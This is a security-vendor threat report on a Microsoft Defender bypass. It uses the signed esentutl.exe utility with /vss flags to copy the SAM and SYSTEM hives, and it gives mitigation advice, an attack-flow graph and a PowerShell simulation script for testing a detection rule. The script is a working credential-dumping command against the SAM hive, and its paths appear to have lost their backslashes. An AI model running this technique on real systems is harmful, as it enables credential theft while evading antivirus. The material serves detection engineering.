SOC Prime Bias: Medium

28 Apr 2026 18:51
newspaper icon PSI | Nemesis

The Month of Bypasses: What Defender Misses

Author Photo
SOC Prime Team linkedin icon Follow
The Month of Bypasses: What Defender Misses
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

The Persistent Security team describes a new way to bypass detection for credential dumping technique T1003.002 by abusing the signed Windows utility esentutl.exe. By using VSS-related flags, the tool can copy the SAM and SYSTEM registry hives without triggering Microsoft Defender in the same way as more common dumping methods.

Investigation

Researchers tested three traditional approaches to dumping the hives, including reg save, vssadmin shadow copy creation, and direct file copying, and found that Defender blocked each of them. They then used AI-assisted variant testing to identify an alternative path: esentutl.exe could access and extract the hives through its built-in VSS functionality while avoiding existing Defender detections.

Mitigation

Recommended defenses include restricting esentutl.exe through AppLocker or WDAC, creating Sysmon rules to detect esentutl executions that use the /vss flag, and monitoring for shadow copy activity initiated outside normal system behavior. Organizations should also deploy LAPS for local administrator accounts and disable VSS where it is not operationally required.

Response

If esentutl.exe is observed running with the /vss flag and writing to files associated with SAM or SYSTEM, defenders should isolate the affected host, collect memory and registry evidence, confirm whether credential dumping occurred, and apply the recommended policy controls to prevent recurrence.

"graph TB %% Class Definitions classDef action fill:#99ccff classDef builtin fill:#cccccc classDef file fill:#ffdd99 %% Nodes action_esentutl_exec["<b>Action</b> – <b>T1218.002 System Binary Proxy Execution</b><br/>Execute esentutl.exe with /y /vss switches to create a Volume Shadow Copy"] class action_esentutl_exec action tool_esentutl["<b>Tool</b> – <b>Name</b>: esentutl.exe<br/><b>Description</b>: Windows internal utility for Extensible Storage Engine management"] class tool_esentutl builtin action_copy_hives["<b>Action</b> – <b>T1003 OS Credential Dumping</b><br/>Copy SAM and SYSTEM hive files from the shadow copy to a writable location"] class action_copy_hives action action_store_unsecured["<b>Action</b> – <b>T1552.001 Credentials In Files</b><br/>Store dumped hive files on disk for later offline parsing"] class action_store_unsecured action file_sam["<b>File</b> – sam_dump<br/><b>Content</b>: SAM hive containing password hashes"] class file_sam file file_sys["<b>File</b> – sys_dump<br/><b>Content</b>: SYSTEM hive containing system boot key"] class file_sys file %% Connections action_esentutl_exec –>|uses| tool_esentutl action_esentutl_exec –>|leads_to| action_copy_hives action_copy_hives –>|uses| tool_esentutl action_copy_hives –>|creates| file_sam action_copy_hives –>|creates| file_sys file_sam –>|used_by| action_store_unsecured file_sys –>|used_by| action_store_unsecured "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    An adversary who has obtained a foothold on a compromised Windows host wishes to harvest credential hashes without triggering typical credential‑dumping tools that are commonly monitored. The attacker leverages the built‑in esentutl.exe binary with the /vss switch to create a shadow copy of the system volume and extract the protected SAM hive. The steps are:

    1. Create a temporary directory for the snapshot export.
    2. Invoke esentutl.exe with the /y (overwrite) and /vss flags, targeting the SAM hive path.
    3. Copy the exported SAM file to a location under the attacker’s control.
    4. (Optional) Clean up the temporary snapshot file to reduce forensic footprint.

    This sequence produces a Sysmon ProcessCreate event where Image ends with esentutl.exe and CommandLine contains the string /vss, satisfying the detection rule.

  • Regression Test Script:

    # ----------------------------------------------
# Simulate VSS‑based SAM extraction using esentutl
# ----------------------------------------------
$tempDir = "$env:TEMPVSS_Export"
New-Item -ItemType Directory -Path $tempDir -Force | Out-Null

# Path to the SAM hive (read‑only copy will be exported)
$samHive = "$env:SystemRootSystem32configSAM"
$outputFile = Join-Path $tempDir "SAM_copy.edb"

# Execute esentutl with VSS to export the SAM hive
$esentPath = "$env:SystemRootSystem32esentutl.exe"
$arguments = "/y /vss `"$samHive`" `"$outputFile`""

Write-Host "Running: $esentPath $arguments"
& $esentPath $arguments

# Verify export succeeded
if (Test-Path $outputFile) {
    Write-Host "SAM hive exported to $outputFile"
} else {
    Write-Warning "Export failed or no file created."
}

# Cleanup snapshot file (optional, depends on OS behavior)
# Note: VSS snapshot files are typically auto‑deleted after export.

  • Cleanup Commands:

    # Remove temporary export directory and files
$tempDir = "$env:TEMPVSS_Export"
if (Test-Path $tempDir) {
    Remove-Item -Recurse -Force -Path $tempDir
    Write-Host "Cleanup complete: $tempDir removed."
} else {
    Write-Host "No cleanup needed; directory not found."
}

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free